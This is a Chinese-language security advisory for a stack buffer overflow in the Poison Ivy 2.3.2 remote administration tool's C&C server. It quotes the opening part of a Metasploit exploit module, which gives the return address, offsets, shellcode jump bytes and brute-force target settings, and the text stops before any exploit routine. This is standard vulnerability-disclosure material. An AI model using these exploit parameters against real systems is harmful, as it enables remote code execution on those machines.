发布日期:2012-07-06
更新日期:2012-07-09
受影响系统:
Poison Ivy Poison Ivy 2.3.2
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 54339
Poison Ivy是远程管理工具。
Poison Ivy 2.3.2在实现上存在栈缓冲区溢出漏洞,攻击者可利用此漏洞在受影响应用中执行任意代码。
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Metasploit ()提供了如下测试方法:
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Brute
def initialize(info = {})
super(update_info(info,
'Name' => "Poison Ivy 2.3.2 C&C Server Buffer Overflow",
'Description' => %q{
This module exploits a stack buffer overflow in Poison Ivy 2.3.2 C&C server.
The exploit does not need to know the password chosen for the bot/server
communication. If the C&C is configured with the default 'admin' password,
the exploit should work fine. In case of the C&C configured with another
password the exploit can fail. The 'check' command can be used to determine
if the C&C target is using the default 'admin' password.
Hopefully an exploit try won't crash the Poison Ivy C&C process, just the thread
responsible of handling the connection. Because of this the module provides the
RANDHEADER option and a bruteforce target. If RANDHEADER is used a random header
will be used. If the bruteforce target is selected, a random header will be sent in
case the default for the password 'admin' doesn't work. Bruteforce will stop after
5 tries or a session obtained.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Andrzej Dereszowski', # Vulnerability Discovery
'Gal Badishi', # Exploit and Metasploit module
'juan vazquez' # Testing and little of Metasploit-fu
],
'References' =>
[
[ 'URL', 'http://www.signal11.eu/en/research/articles/targeted_2010.pdf' ],
[ 'URL', 'http://badishi.com/own-and-you-shall-be-owned' ]
],
'DisclosureDate' => "Jun 24 2012",
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'StackAdjustment' => -4000,
'Space' => 10000,
'BadChars' => "",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Poison Ivy 2.3.2 / Windows XP SP3 / Windows 7 SP1',
{
'Ret' => 0x0041AA97, # jmp esp from "Poison Ivy 2.3.2.exe"
'RWAddress' => 0x00401000,
'Offset' => 0x806D,
'PayloadOffset' => 0x75,
'jmpPayload' => "\x81\xec\x00\x80\x00\x00\xff\xe4" # sub esp,0x8000 # jmp esp
}
],
[ 'Poison Ivy 2.3.2 - Bruteforce / Windows XP SP3 / Windows 7 SP1',
{
'Ret' => 0x0041AA97, # jmp esp from "Poison Ivy 2.3.2.exe"
'RWAddress' => 0x00401000,
'Offset' => 0x806D,
'PayloadOffset' => 0x75,
'jmpPayload' => "\x81\xec\x00\x80\x00\x00\xff\xe4", # sub esp,0x8000 # jmp esp
'Bruteforce' =>
{
'Start' => { 'Try' => 1 },
'Stop' => { 'Try' => 6 },
'Step' => 1,
'Delay' => 2
}
}
],
],
'DefaultTarget' => 0
))